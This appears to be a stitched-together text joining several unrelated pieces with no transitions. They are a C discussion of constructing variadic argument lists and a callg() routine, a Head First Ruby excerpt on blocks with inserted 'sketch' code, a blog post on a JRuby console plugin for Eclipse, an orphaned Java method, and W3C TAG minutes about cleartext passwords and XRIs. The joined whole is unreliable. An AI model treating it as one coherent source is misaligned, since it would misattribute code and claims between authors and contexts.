The second question is of course how to construct the argument list pointed to by argp. I've had a number of ideas over the years on how to do this; perhaps the best (or at least the one I'm currently happiest with) is to do something like this:
extern func();

va_alloc(arglist, 10);
va_list argp;

va_start2(arglist, argp);
va_arg(argp, int) = 1;
va_arg(argp, double) = 2.3;
va_arg(argp, char *) = "four";
va_finish2(arglist, argp);

callg(func, arglist);
The above is equivalent to the simple call
func(1, 2.3, "four");
Now, the interesting thing is that it's often (perhaps even "usually") possible to construct va_alloc, va_start2, and va_finish2 macros such as I've illustrated above such that the standard va_arg macro out of <stdarg.h> or <varargs.h> does the real work. (In other words, the traditional implementations of va_arg would in fact work in an lvalue context, i.e. on the left hand side of an assignment.)
I'm fairly sure I've got working versions of macros along the lines of va_alloc, va_start2, and va_finish2 macros somewhere, but I can't find them at the moment, either. At the end of this message I'll append a different set of macros, not predicated on the assumption of being able to re-use the existing va_arg on the left hand side, which should serve as an example of the essential implementation ideas.
A third question is what to do if the return type (not just the argument list) of the called function is not known at compile time. (If you're still with me, we're moving in the direction of doing so much at run time that we've practically stopped compiling and started interpreting, and in fact many of the ideas I'm discussing in this note come out of my attempts to write a full-blown C interpreter.) We can answer the third question by adding a third argument to our hypothetical callg() routine, involving a tag describing the type of result we expect and a union in which any return value can be stored.
A fourth question is how to write this hypothetical callg() function. It is one of my favorite examples of a function that essentially must be written in assembler, not for efficiency, but because it's something you simply can't do in C. It's actually not terribly hard to write; I've got implementations of it for most of the machines I use. I write it for a new environment by compiling a simple little program fragment such as
int nargs;
int args[10];
int (*funcp)();
int i;

switch(nargs) {
case 0:  (*funcp)(); break;
case 1:  (*funcp)(args[0]); break;
case 2:  (*funcp)(args[0], args[1]); break;
...

for(i = 0; i < nargs; i++)
    (*funcp)(args[i]);
, and massaging the assembly language output to push a variable number of arguments before performing the (single) call. It's possible to do this without knowing very much else about the assembly/machine language in use. (It helps a lot to have a compiler output or listing option which lets you see its generated assembly language.)
When I say it's generally easy to write callg, I'm thinking of conventional, stack-based machines. Some modern machines pass some or all arguments in registers, and which registers are used can depend on the type of the arguments, which makes this sort of thing much harder.
A fifth question is where my name "callg" comes from. The VAX has a single instruction, CALLG, which does exactly what you want here. (In other words, an assembly-language implementation of this callg() routine is a single line of assembler on the VAX.) I've also used the name va_call instead of callg.
If you have questions or comments prompted by any of this, or if you'd like to see more code fragments, feel free to ask.
Steve Summit
[The aforementioned "set of macros" is in this file: varargs2.h .]
Using blocks in Ruby
With this excerpt from Head First Ruby, you’ll learn about Ruby blocks by looking at each concept from different angles.
A block is a chunk of code that you associate with a method call. While the method runs, it can invoke (execute) the block one or more times. Methods and blocks work in tandem to process your data. Blocks are a way of encapsulating or packaging statements up and using them wherever you need them. They turn up all over Ruby code.
Blocks are mind-bending stuff. But stick with it!
Even if you’ve programmed in other languages, you’ve probably never seen anything like blocks. But stick with it, because the payoff is big.
Imagine if, for all the methods you have to write for the rest of your career, someone else wrote half of the code for you. For free. They’d write all the tedious stuff at the beginning and end, and just leave a little blank space in the middle for you to insert your code, the clever code, the code that runs your business.
If we told you that blocks can give you that, you’d be willing to do whatever it takes to learn them, right?
Well, here’s what you’ll have to do: be patient, and persistent. We’re here to help. We’ll look at each concept repeatedly, from different angles. We’ll provide exercises for practice. Make sure to do them, because they’ll help you understand and remember how blocks work.
A few hours of hard work now are going to pay dividends for the rest of your Ruby career, we promise. Let’s get to it!
Defining a method that takes blocks
Blocks and methods work in tandem. In fact, you can’t have a block without also having a method to accept it. So, to start, let’s define a method that works with blocks.
(On this page, we're going to show you how to use an ampersand,
&, to accept a block, and the
call method to call that block. This isn't the quickest way to work with blocks, but it does make it more obvious what's going on. We'll show you
yield, which is more commonly used, in a few pages!)
Since we’re just starting off, we’ll keep it simple. The method will print a message, invoke the block it received, and print another message.
If you place an ampersand before the last parameter in a method definition, Ruby will expect a block to be attached to any call to that method. It will take the block, convert it to an object, and store it in that parameter.
Remember, a block is just a chunk of code that you pass into a method. To execute that code, stored blocks have a
call instance method that you can call on them. The
call method invokes the block’s code.
Okay, we know, you still haven’t seen an actual block, and you’re going crazy wondering what they look like. Now that the setup’s out of the way, we can show you…
Your first block
Are you ready? Here it comes: your first glimpse of a Ruby block.
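A sketch of what such a block can look like (the body is an assumption; any code could go here):

do
  puts "We're in the block!"
end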
There it is! Like we said, a block is just a chunk of code that you pass to a method. We invoke
my_method, which we just defined, and then place a block immediately following it. The method will receive the block in its
my_block parameter.
The start of the block is marked with the keyword
do, and the end is marked by the keyword
end.
The block body consists of one or more lines of Ruby code between
do and
end. You can place any code you like here.
When the block is called from the method, the code in the block body will be executed.
After the block runs, control returns to the method that invoked it.
So we can call my_method and pass it the above block. The method receives the block in its my_block parameter, so we can refer to the block inside the method.
…and here’s the output we’d see:
Flow of control between a method and block
We declared a method named
my_method, called it with a block, and got the output shown above.
Let’s break down what happened in the method and block, step by step.
The first
puts statement in
my_method’s body runs.
The method:
def my_method(&my_block)
  puts "We're in the method, about to invoke your block!"
  my_block.call
  puts "We're back in the method!"
end
The block:
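Again assuming the block body from the call above:

do
  puts "We're in the block!"
end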
The
my_block.call expression runs, and control is passed to the block. The
puts expression in the block's body runs.
When the statements within the block body have all run, control returns to the method. The second call to
puts within
my_method’s body runs, and then the method returns.
Calling the same method with different blocks
You can pass many different blocks to a single method.
We can pass different blocks to the method we just defined, and do different things:
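For example (the block bodies are illustrative):

my_method do
  puts "It's a block party!"
end

my_method do
  puts 1 + 2
end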
The code in the method is always the same, but you can change the code you provide in the block.
Calling a block multiple times
A method can invoke a block as many times as it wants.
This method is just like our previous one, except that it has two
my_block.call expressions:
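The method, plus a sample call (the block body here is illustrative; the definition also appears later, in the section on yield):

def twice(&my_block)
  my_block.call
  my_block.call
end

twice do
  puts "Hello!"
end

Hello!
Hello!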
The method name is appropriate: as you can see from the output, the method does indeed call our block twice!
Statements in the method body run until the first
my_block.call expression is encountered. The block is then run. When it completes, control returns to the method.
The method body resumes running. When the second
my_block.call expression is encountered, the block is run again. When it completes, control returns to the method so that any remaining statements there can run.
Block parameters
We learned back in Chapter 2 that when defining a Ruby method, you can specify that it will accept one or more parameters:
def print_parameters(p1, p2)
  puts p1, p2
end
You’re probably also aware that you can pass arguments when calling the method that will determine the value of those parameters.
In a similar vein, a method can pass one or more arguments to a block. Block parameters are similar to method parameters; they’re values that are passed in when the block is run, and that can be accessed within the block body.
Arguments to
call get forwarded on to the block, as the sketch below shows.
You can have a block accept one or more parameters from the method by defining them between vertical bar (
|) characters at the start of the block:
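A sketch showing both sides (the argument values are illustrative):

def my_method(&my_block)
  my_block.call("argument 1", "argument 2")
end

my_method do |param1, param2|
  puts param1, param2
end

argument 1
argument 2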
So, when we call our method and provide a block, the arguments to
call are passed into the block as parameters, which then get printed. When the block completes, control returns to the method, as normal.
Using the “yield” keyword
So far, we’ve been treating blocks like an argument to our methods. We’ve been declaring an extra method parameter that takes a block as an object, then using the
call method on that object.
def twice(&my_block)
  my_block.call
  my_block.call
end
We mentioned that this wasn’t the easiest way to accept blocks, though. Now, let’s learn the less obvious but more concise way: the
yield keyword.
The
yield keyword will find and invoke the block a method was called with—there’s no need to declare a parameter to accept the block.
This method is functionally equivalent to the one above:
def twice
  yield
  yield
end
Just like with
call, we can also give one or more arguments to
yield, which will be passed to the block as parameters. Again, these methods are functionally equivalent:
def give(&my_block)
  my_block.call("2 turtle doves", "1 partridge")
end

def give
  yield "2 turtle doves", "1 partridge"
end
Block formats
So far, we’ve been using the
do...end format for blocks. Ruby has a second block format, though: “curly brace” style. You’ll see both formats being used “in the wild,” so you should learn to recognize both.
Aside from
do and
end being replaced with curly braces, the syntax and functionality are identical.
And just as
do...end blocks can accept parameters, so can curly-brace blocks:
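For example (assuming methods like the ones defined earlier):

my_method { puts "We're in the block!" }

my_method { |param1, param2| puts param1, param2 }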
By the way, you’ve probably noticed that all our
do...end blocks span multiple lines, but our curly-brace blocks all appear on a single line. This follows another convention that much of the Ruby community has adopted. It's valid syntax to do it the other way around.
But not only is that out of line with the convention, it’s really ugly.
The “each” method
We had a lot to learn in order to get here: how to write a block, how a method calls a block, how a method can pass parameters to a block. And now, it’s finally time to take a good, long look at the method that will let us get rid of that repeated loop code in our
total,
refund, and
show_discounts methods. It’s an instance method that appears on every
Array object, and it’s called
each.
You’ve seen that a method can yield to a block more than once, with different values each time:
The
each method uses this feature of Ruby to loop through each of the items in an array, yielding them to a block, one at a time.
If we were to write our own method that works like
each, it would look very similar to the code we've been writing all along; a sketch follows below.
We loop through each element in the array, just like in our
total,
refund, and
show_discounts methods. The key difference is that instead of putting code to process the current array element in the middle of the loop, we use the
yield keyword to pass the element to a block.
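A sketch of such a method (the name my_each is illustrative):

def my_each(array)
  index = 0
  while index < array.length
    yield array[index]
    index += 1
  end
end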
The “each” method, step-by-step
We’re using the
each method and a block to process each of the items in an array:
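For example (the array contents are illustrative):

["first", "second", "third"].each do |item|
  puts item
end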
Let’s go step-by-step through each of the calls to the block and see what it’s doing.
For the first pass through the
while loop,
index is set to
0, so the first element of the array gets yielded to the block as a parameter. In the block body, the parameter gets printed. Then control returns to the method,
index gets incremented, and the
while loop continues.
Now, on the second pass through the
while loop,
index is set to
1, so the second element in the array will be yielded to the block as a parameter. As before, the block body prints the parameter, control then returns to the method, and the loop continues.
After the third array element gets yielded to the block for printing and control returns to the method, the
while loop ends, because we've reached the end of the array. No more loop iterations means no more calls to the block; we're done!
That’s it! We’ve found a method that can handle the repeated looping code, and yet allows us to run our own code in the middle of the loop (using a block). Let’s put it to use!
DRYing up our code with “each” and blocks
Our invoicing system requires us to implement these three methods. All three of them have nearly identical code for looping through the contents of an array.
It’s been difficult to get rid of that duplication, though, because all three methods have different code in the middle of that loop.
But now we’ve finally mastered the
each method, which loops over the elements in an array and passes them to a block for processing.
Let’s see if we can use
each to refactor our three methods and eliminate the duplication.
First up for refactoring is the
total method. Just like the others, it contains code for looping over prices stored in an array. In the middle of that looping code,
total adds the current price to a total amount.
The
each method looks like it will be perfect for getting rid of the repeated looping code! We can just take the code in the middle that adds to the total, and place it in a block that’s passed to
each.
Let’s redefine our
total method to utilize
each, then try it out.
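The refactored method and a trial call (this same definition reappears below, in the discussion of variable scope):

def total(prices)
  amount = 0
  prices.each do |price|
    amount += price
  end
  amount
end

puts total([3.99, 25.00, 8.99])

37.98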
Perfect! There’s our total amount. The
each method worked!
For each element in the array,
each passes it as a parameter to the block. The code in the block adds the current array element to the
amount variable, and then control returns back to
each.
We’ve successfully refactored the
total method!
But before we move on to the other two methods, let’s take a closer look at how that
amount variable interacts with the block.
Blocks and variable scope
We should point something out about our new
total method. Did you notice that we use the
amount variable both inside and outside the block?
def total(prices)
  amount = 0
  prices.each do |price|
    amount += price
  end
  amount
end
As you may remember from Chapter 2, the scope of local variables defined within a method is limited to the body of that method. You can’t access variables that are local to the method from outside the method.
The same is true of blocks, if you define the variable for the first time inside the block.
But, if you define a variable before a block, you can access it inside the block body. You can also continue to access it after the block ends!
Since Ruby blocks can access variables declared outside the block body, our
total method is able to use
each with a block to update the
amount variable.
def total(prices)
  amount = 0
  prices.each do |price|
    amount += price
  end
  amount
end
We can call
total like this:
total([3.99, 25.00, 8.99])
The
amount variable is set to
0, and then
each is called on the array. Each of the values in the array is passed to the block. Each time the block is called,
amount is updated.
When the
each method completes,
amount is still set to that final value,
37.98. It’s that value that gets returned from the method.
Using “each” with the “refund” method
We’ve revised the
total method to get rid of the repeated loop code. We need to do the same with the
refund and
show_discounts methods, and then we’ll be done!
The process of updating the
refund method is very similar to the process we used for
total. We simply take the specialized code from the middle of the generic loop code, and move it to a block that’s passed to
each.
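A sketch of the refactored method (assuming, as in the original, that a refund is represented as a negative amount):

def refund(prices)
  amount = 0
  prices.each do |price|
    amount -= price
  end
  amount
end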
Much cleaner, and calls to the method still work just the same as before!
Within the call to
each and the block, the flow of control looks very similar to what we saw in the
total method.
Using “each” with our last method
One more method, and we’re done! Again, with
show_discounts, it’s a matter of taking the code out of the middle of the loop and moving it into a block that’s passed to
each.
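A sketch of the refactored method (the discount calculation shown is illustrative):

def show_discounts(prices)
  prices.each do |price|
    amount_off = price / 3.0
    puts format("Your discount: $%.2f", amount_off)
  end
end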
Again, as far as users of your method are concerned, no one will notice you’ve changed a thing!
Here’s what the calls to the block look like:
Our complete invoicing methods
Note
Do this!
Save this code in a file named prices.rb. Then try running it from the terminal!
We’ve gotten rid of the repetitive loop code!
We’ve done it! We’ve refactored the repetitive loop code out of our methods! We were able to move the portion of the code that differed into blocks, and rely on a method,
each, to replace the code that remained the same!
Utilities and appliances, blocks and methods
Imagine two electric appliances: a mixer and a drill. They have very different jobs: one is used for baking, the other for carpentry. And yet they have a very similar need: electricity.
Now, imagine a world where, any time you wanted to use an electric mixer or drill, you had to wire your appliance into the power grid yourself. Sounds tedious (and fairly dangerous), right?
That’s why, when your house was built, an electrician came and installed power outlets in every room. The outlets provide the same utility (electricity) through the same interface (an electric plug) to very different appliances.
The electrician doesn’t know the details of how your mixer or drill works, and he doesn’t care. He just uses his skills and training to get the current safely from the electric grid to the outlet.
Likewise, the designers of your appliances don’t have to know how to wire a home for electricity. They only need to know how to take power from an outlet and use it to make their devices operate.
You can think of the author of a method that takes a block as being kind of like an electrician. They don’t know how the block works, and they don’t care. They just use their knowledge of a problem (say, looping through an array’s elements) to get the necessary data to the block.
def wire
  yield "current"
end
You can think of calling a method with a block as being kind of like plugging an appliance into an outlet. Like the outlet supplying power, the block parameters offer a safe, consistent interface for the method to supply data to your block. Your block doesn’t have to worry about how the data got there, it just has to process the parameters it’s been handed.
Not every appliance uses electricity, of course; some require other utilities. There are stoves and furnaces that require gas. There are automatic sprinklers and spray nozzles that use water.
Just as there are many kinds of utilities to supply many kinds of appliances, there are many methods in Ruby that supply data to blocks. The
each method was just the beginning. Blocks, also sometimes known as lambdas, are crucial components of Ruby. They are used in loops, in functions that have to run code at some future time (known as callbacks), and other contexts.
Like so many others my
imagination has been captured by Ruby. Perhaps it is because of the steep rise
in its awareness the software development community has undergone since Rails,
perhaps it is a combination of its quirky constructs, enthusiastic (and often
surreal) proponents, and the fact that DSLs are
gaining respect and momentum. At the
same time, the JVM is becoming an obvious platform choice and Java itself is
starting to look a little tired and lost as a language.
Perhaps Java is reaching its
sell-by date, after all, there do seem to be natural universal laws about these things; and
they apply to a great many domains. Fashion, empires and programming languages
are three that I can think of which adhere to these rules. They rise, dominate
and fall. Sometimes they come back, (like flared trousers and interpreters) but
even if they die, they always leave their legacy, like the Roman
Empire, or Cobol.
Anyway, it is obvious that however long it stays in vogue, one such mark that will be left by Java is the JVM as a platform, and fascinated as I am by Ruby, I think that JRuby is
(together with Rails) what will really keep it on the map. I find myself more
and more regularly explaining to colleagues and clients (partly to prevent them
rolling their eyes as one does when faced with a religious fanatic, or a pushy
salesperson) that I only really love Ruby and crowbar it into every discussion
I can, because compiled languages like
Java exist. JRuby makes using Ruby sensible (and
cool).
Why is this cool? Because
like so many consultants, it is my job it is to help people come up with general,
repeatable solutions to their problems, so I am always on the lookout for some
sort of lazy reuse idea. Since all clients want those three very simple and clearly
mutually exclusive features that constantly haunt us, i.e. good, fast and
cheap, I find myself drawn to the model of leveraging powerful application
libraries with glue code or something minimal, scriptable and clever.
JRuby fits that bill quite nicely.
Or does it? Isn’t this falling into the old trap of trying getting non-programmers to write programs? Haven’t previous attempts at this
failed? Languages like BPEL and Visual
Basic and even (looking back a bit further) Cobol have
all, in their own way, in their own domains tried to make programming easy.
These have all ended up producing horrible languages. In the case of the latter
two they have also produced code bases huge and prevalent by virtue of their
easy proliferation, not their suitability for solving the problem. Not popular
with OO purists and lovers of aesthetically pleasing languages!
Well now we have more languages
like JRuby (and Jython and
Groovy etc.) which allow us pleasing constructs, great power and efficient
syntax together with access to Java libraries and access to any platform which
has a JVM implementation. More importantly, perhaps, is that this translates into access to any Java middleware. Excellent! This means that
the powerful application stuff can be written by the software engineers and the
business logic can be written (at least initially) by the domain experts, using
a domain specific language (or domain specific flavour, if language isn't subtle enough).
This should mean that we can give an expert in the domain of feet enough power to shoot
themselves in the foot with a homing missile, and they wouldn't have to be a rocket scientist.
What is doubly pleasing of course, is the fact that Ruby by its nature is dynamic (as are some of the other languages which have JVM
implementations), and building a domain specific
language to solve a problem can be implemented quite elegantly. So helping
prevent our domain experts from getting in too much trouble is a bit easier. We can expose the important bits to them and shield the complexity from them. Very importantly though, they will always have the full power of
the language at their finger tips should they need it.
Triply pleasing perhaps, is
the fact that you can do all of this in an interactive shell (jirb in JRuby) if you want to, which is a great and agile way to
wire up existing domain libraries, or produce "glue code".
You can embark on a learning adventure with a
framework, or library and produce a solution that can form the basis of
something permanent. For example, you
can experiment with the creation of swing applications using
JRuby from the interactive shell. This is so easy that even
a sock puppet could do it (and did, see
here!).
I got to thinking that one
of the environments it would be great to play with was the Eclipse
environment. It is
a mature, fairly solid platform, with a sound plugin model
and some very powerful development tools available in it. What would be great,
I thought, would be if you could script in it, or create macros, even. Creating
an interactive shell would give you access to any plugins
you liked. Certainly it seemed it would be a worthwhile effort plugging in an
interactive shell to see what would happen. As a self-confessed
non-expert-but-fascinated wannabe Ruby-ist, I thought
I could kill two birds with one (precious) stone, i.e. learn more about the language
and learn more about the Eclipse platform at the same time.
How did I do this? Some of
the highlights follow below. If you
really can’t bear the thought of looking through code, or want to see
everything in its entirety, then download this zip which has the Eclipse
plugin and the full source included:
The obvious place to start looking
at how to do this was jirb,
the interactive Ruby shell written for JRuby. Of
course, I thought, this would be a Java console that read in a line of text and
passed it to the Ruby interpreter for evaluation, so it couldn’t be too hard to
re-implement this in an Eclipse app.
After some head scratching,
I realised that this was very cunning and would actually help make my life
easier. I did some investigation into the irb code, and with help from a good
(albeit old) article
by Leonard Richardson about unit testing the Ruby Cookbook source code, I
discovered that redirecting irb input and output is fairly straightforward. Turns out that
all you need to do is extend the Ruby Irb class and
get it to use our own input and output streams. The Irb
class implements the strategy pattern to read from its input stream using an
InputMethod. Creating an Input Method is as simple as
providing a Ruby class which has a gets operation and a prompt= setter method. The
prompt= setter method is necessary, because irb will throw exceptions
without it (although I admit I am stumped as to why it is there; it doesn't
seem to do anything other than pass in an empty string.)
I needed to customise my prompt,
and get the line of text typed, so:
class EclipseConsoleInputMethod
# echo the prompt and get a line of input.
def gets
$stdout.print 'eIrb:> '
$stdin.gets
end
def prompt=(x)
end
end
And now, I could minimally extend
the Ruby Irb class to give me a custom
Irb class, which has the right context and some useful
configurations:
class EclipseConsoleIrb < IRB::Irb
def initialize(ec_inputmethod)
IRB.setup(__FILE__)
IRB.conf[:VERBOSE] = false
super(nil, ec_inputmethod)
end
def run
IRB.conf[:MAIN_CONTEXT] = self.context
eval_input
end
end
Not too hard at all!
Now what I needed to do was get an Eclipse
console to provide said input and output streams and pass the typed Ruby code into
the former and echo the results into the latter.
Eclipse’s IO Console does that
job very well, it displays in the normal Eclipse Console area, provides and
input stream for you, and can have multiple output streams directed to it, perfect.
(You can even set colours for the different streams!)
Highlights below:
import org.jruby.Ruby;
public class RubyConsole extends IOConsole implements Runnable {
public void run() {
..
RubyInstanceConfig conf = new RubyInstanceConfig() {
public InputStream getInput() {return in;}
public PrintStream getOutput() {return out;}
public PrintStream getError() {return err;}
..
}
..
try {
Ruby rubyRuntime = Ruby.newInstance(conf);
String jRubyHome = System.getProperty("jruby.home");
String jRubyVersion = System.getProperty("jruby.version");
rubyRuntime.evalScriptlet("$:.insert(0,"+jRubyHome+"\\lib\\ruby\\"+jRubyVersion+"')");
rubyRuntime.evalScriptlet("$:.insert(0,'"+jRubyHome+"\\lib')");
rubyRuntime.evalScriptlet("require 'jruby';");
rubyRuntime.evalScriptlet("require 'eclipse_console_irb';");
} catch (Exception e) {
e.printStackTrace();
}
}
}
The Console can be added to
the GUI by a very simple piece of code. I chose to add it by creating an action
that creates a new Console, so I have a new menu
entitled Ruby Console
..
static RubyConsole ruby = new RubyConsole();
..
ConsolePlugin.getDefault().
getConsoleManager().addConsoles(new IConsole[]{ ruby });
ConsolePlugin.getDefault().getConsoleManager().showConsoleView(ruby);
..
After I build the
plugin from my project, and deploy it, I get the rather
pleasing result of a Ruby console in my Eclipse workbench with
an eIrb>: prompt at the
console, and the interpreter’s results shown as I type in commands. It even has
nice colours.
What can you do with this
though? Well anything you like (within
reason) but provided your plugin has added upstream
plugins to its dependency list, you can load any Java
classes you like from that plugin and work with them.
For example, I have added the “org.eclipse.core.resources”
to my RubyConsole plugin’s
dependency list, and so I can access the Eclipse Workspace by typing:
eIrb:> include_class 'org.eclipse.core.resources.ResourcesPlugin'
=> ["org.eclipse.core.resources.ResourcesPlugin"]
eIrb:> workspace = ResourcesPlugin.get_workspace
=> #<Java::OrgEclipseCoreInternalResources::Workspace:0x25abb1 @java_object=org.eclipse.core.internal.resources.Workspace@12605d>
eIrb:> workspace.methods
eIrb:> projects = workspace.get_root.get_projects
eIrb:> projects.each { |p|
eIrb:> puts p.get_name
eIrb:> }
eIrb:> projects[0].build(0,nil)
eIrb:> projects[0].close(0,nil)
eIrb:> workspace.get_root.get_project('project1').open nil
You can also load your own .rb files with require:
eIrb:> require 'useful.rb'
The plugin with source code. All version info, etc. is in the readme.txt:
RubyConsoleJeremyMeyerBlog.zip
Puppets Do JRuby:
public int available() throws IOException {
if (closed && eofSent) {
throw new IOException("Input Stream Closed"); //$NON-NLS-1$
} else if (size == 0) {
if (!eofSent) {
eofSent = true;
return -1;
}
throw new IOException("Input Stream Closed"); //$NON-NLS-1$
}
return size;
}
Agenda
See also: IRC log
<scribe> scribe: Dan
-> Passwords in the Clear May 1 2008
discussion of skw's comments on "The Digest method is subject to dictionary attacks, and must not be used except in circumstances where passwords are known to be of sufficient length and complexity to thwart such attacks."
SKW: I prefer to replace the imperative "must not" with factual phrasing
DO: hmm... ok
<noah> The sophistication and power of dictionary-based attacks continues to increase such that longer and complex passwords are increasingly vulnerable to attack.
NM suggests replacement for "The sophistication and power of dictionary-based attacks continues to increase such that longer and complex passwords are vulnerable to attacks, not just short passwords using common terms."
<noah> Short passwords or those using common words should not be used with digest authentication. Indeed, The sophistication and power of dictionary-based attacks continues to increase such that longer and more complex passwords are increasingly vulnerable to attack.
DO commits a 20 May revision...
DO: so on 2.1.1... are we done?
TBL: clarify "dictionary attack" as "offline dictionary attack"?
DO: the fact that it's subject to dictionary attack has to do with the presence of nonces in the protocol.
TBL: there are online dictionary attacks where each attempt involves communication with the server and offline attacks where attempts don't involve communication with the server
SKW: just add "offline"?
TBL: well... is that enough to explain it to our readership?
<timbl> add ,because a single session can be recrded and attacked offline,
<timbl> add ,because a single session can be recorded and attacked offline,
<timbl> in place of '
<timbl> in place of the comma after "disctionary attack"
<dorchard> The Digest method is subject to dictionary attacks because a single session can be recorded and attacked offline. It is particularly vulnerable in circumstances where passwords are known to be of insufficient length and complexity to thwart such attacks.
<timbl> dictionary dictionary dictionary dictionary dictionary
<timbl> +1
modulo "it", seems good to several
<dorchard> particularly vulnerable in circumstances where passwords are known to be of insufficient length and complexity to thwart such attacks.
<dorchard> The Digest method is subject to dictionary attacks because a single session can be recorded and attacked offline. The Digest method is particularly vulnerable in circumstances where passwords are known to be of insufficient length and complexity to thwart such attacks.
poll shows that's ok
DO: let's look at section 1
various editorial comments
DO: on to section 2... boxed notes...
... hmm... "A server SHOULD NOT" vs "A client browser MUST NOT ..."
SKW: how does W3C's site work?
DC: basic auth. passwords in the clear. [we've tried many times to get rid of them, but we get stuck somewhere in deployment]
TBL: have we explained how to do without passwords in the clear?
DO: we talk about digest and SSL/TLS
NM: so the security context WG is saying "never do basic without ssl"... are we going that far?
DO: this finding is about "securely ..."
... as the security context WG has said, when sites like w3.org use passwords in the clear, not only is w3.org at risk, but users are trained to use passwords in the clear
TBL: how about a distinctive UI when a browser prompts for passwords that are going to be transmitted in the clear?
DO: I've seen user interfaces for password strength
NM: does it help that much if one site goes to SSL? if I've used that password elsewhere, I'm still in trouble.
SKW: naive users don't really understand these subtleties
NDW: our audience is not end-users but site developers and perhaps browser/client developers. we can make a strong statement, and perhaps they'll improve things. how they improve things is beyond our scope
DC: well...
TBL: let's target the finding and give clear advice
DO: see "Automatic Protection by User agent" which is clearly about what browsers/ajax apps...
TBL: how many sites use basic auth anyway? don't most of them use forms+cookies? are we OK with cookies?
DC: cookies are pretty much passwords to me. they're session keys
DO: no, let's leave cookies aside; this finding is about passwords
SKW: are cookies discussed in the current draft?
... "temporary storage in cookes" is in the intro
DC: regarding w3.org... if the TAG resolves that cleartext passwords MUST NOT be used, as team contact, I'll be obliged to try to deploy this on w3.org; we've tried a number of times in the past and failed due to lack of software support for digest etc.
SKW: how about SSL?
DC: I don't recall how far we tried SSL; that would probably be the thing to try this time
AM: this finding advises users not to use sites that do passwords in the clear; how can users tell?
DO: there are UI clues in browsers
... given forms and javascript and such, browsers can't exhaustively determine
SKW: time draws near...
DO: the one critical issue I see is the inconsistency between SHOULD NOT and MUST NOT
... let's make them both MUST NOT
SKW: I'd prefer to just enumerate the risks and leave out the imperatives
<dorchard> There are no scenarios where it is secure to transmit passwords in the clear. Every scenario that involves possibly transmitting passwords in the clear can be redesigned for the desired functionality without a cleartext password transmission.
DO: feel obliged to represent the position of the Secrurity WG
TBL: how about "... without risk" and MUST NOT
PROPOSED: to approve the passwordsInTheClear finding, contingent on tbl's ok, and call for review by web security context wg, [http? wg], html WG, XHTML 2 WG
... OASIS WSX TC
... W3C security spec maintenance WG
<Ashok> OASIS WS-SX
so RESOLVED.
<scribe> ACTION: David finish refs etc on passwords in the clear finding [recorded in]
<trackbot-ng> Created ACTION-150 - Finish refs etc on passwords in the clear finding [on David Orchard - due 2008-05-27].
[break]
<timbl> PWITC is OK by me
<timbl> You can resolve the contingency on me
TBL: I'm interested in review by browser makers too
HT: perhaps via their AC reps?
DO: not RoR devs?
TBL: sure... this is a heads up, not a round-trip, is it?
DO: this is a round-trip to many of these groups
TBL: OK, let's just notify the browser makers
SKW: we're resolved contingent on HT, NDW, and myself; the contingency has resolved.
<scribe> ACTION: henry announce namespaceDocument-8 finding on tag-announce etc. [recorded in]
<trackbot-ng> Created ACTION-151 - Announce namespaceDocument-8 finding on tag-announce etc. [on Henry S. Thompson - due 2008-05-27].
JAR: has anyone implemented it?
HT: no, though any RDDL 1.0 document has the relevant info... did one of us produce a stylesheet for that?
(hmm... who's going to update the RDDL namespace doc?)
HT: work on this was preempted by work on ARIA etc.
JAR: fwiw, Alan R. and I have been working on a document with overlapping scope
<scribe> ACTION: Jonathan review overlap between the HCLSI URI note and HT's w.r.t. contribution to TAG finding on UrnsAndRegistries [recorded in]
<trackbot-ng> Created ACTION-152 - Review overlap between the HCLSI URI note and HT's w.r.t. contribution to TAG finding on UrnsAndRegistries [on Jonathan Rees - due 2008-05-27].
SKW: there was an OASIS last call on XRIs... closes 30 May
AM: remind me what our earlier comments are?
HT: [summarizes]
www-tag/2008Feb/0009.html is projected
NM: what's the status of XRIs? how does that relate to OpenID?
HT: OpenID has a forward reference to a moving target XRI spec. [?]
TBL: that's a bug [re the use of conneg in HTTP as discussed in 2008Feb/0104 ]
-> XRI TC response to W3C TAG Comments on XRI Resolution 2.0
<dorchard> I see in OpenID the following: <Service xmlns="xri://$xrd*($v*2.0)">. I don't think this is legal, is it?
<CGI691> from
[[[ Scribe: Is CGI691 Ashok? ]]]
<timbl> maybe
<timbl> Extensible Resource Identifier (XRI)
<timbl> Resolution Version 2.0
<timbl> Committee Draft 02
<timbl> 25 November 2007
<CGI691> I do see in OpenID Supports the use of XRIs as Identifiers. XRIs may be used as Identifiers for both end users and OPs, and provide automatic mapping from one or more reassignable i-names to a synonymous persistent Canonical ID that will never be reassigned
SKW: I've been asked what's the TAG's position on XRIs
<ht> DanC, see
TBL: why didn't we ship that finding?
<Stuart> see table 5 line 351.
HT: because we thought it only worked for people who already agreed with us
DO: but in retrospect, that was a mistake: even that would have helped http: advocates in OpenID work
... I'm inclined to come back to this after doing some drafting over a break
NM: hmm... take a position on XRI-in-OpenID while we're at it?
... perhaps there's a risk that OpenID will be the vehicle that brings XRI into widespread use
DO: quite. I'm concerned about that.
(re xris vs email, I found something nearby... )
SKW: we have some concerns, but what conclusions?
... testing the waters... poll: all the cases addressed by XRIs can be addressed using HTTP URIs?
many in support.
HT: well... there's a trade-off... if somebody gives up ubiquity, they can get more control
NM: there are certain clear drawbacks to a new scheme... list those... we haven't seen any motivation to overcome those disadvantages
... how about something like that?
<Service xmlns="xri://$xrd*($v*2.0)">
^ from openid2
<CGI691> I observe that XRI has now published a naming dispute resolution mechanism at
<timbl> ACTION notes deb
quite
[lunch]
<Norm> scribenick: norm
<scribe> scribe: Norm
Meeting resumes
ht: or wrw war aggw a rrgggww
General laughter at a joke that won't work in the minutes
<scribe> Chair: timbl
SW expresses some concerns about the tone of the message.
Proposed: We send the text drafted at this meeting to the internal tag list, with an action for Henry to fill in the blanks. To be mailed publicly by Tim and Stuart, co-chairs of the TAG.
<DanC_lap> no, not the internal tag list; www-tag
<DanC_lap> oh. I see.
Resolved.
<scribe> Chair: Stuart
<DanC_lap> action-116?
<trackbot-ng> ACTION-116 -- Tim Berners-Lee to align the tabulator internal vocabulary with the vocabulary in the rules, getting changes to either as needed. -- due 2008-03-06 -- OPEN
<trackbot-ng>
JR: We've been meeting by phone. Some sort of ontology for HTTP seems to be in the works.
... Some goals: use in the tabulator, use in next webarch, integration with bigger ontologies for interoperability,
... provenance (citations on the web), alignment of goals across several of these projects,
... more baking for the resource/information resource distinction,
... There's a question of how to manage the mailing list members.
HT: I think we should give JR control of the list.
General agreement.
JR: Some statements we'd like to be able to answer:
<timbl>
JR: questions about pure mechanics, "the string that was in the response..."
... What does RFC 2616 say about the entity?
... What do the status codes mean (specifically, 200 and 3xx)
... What does a 200 response say about the resource?
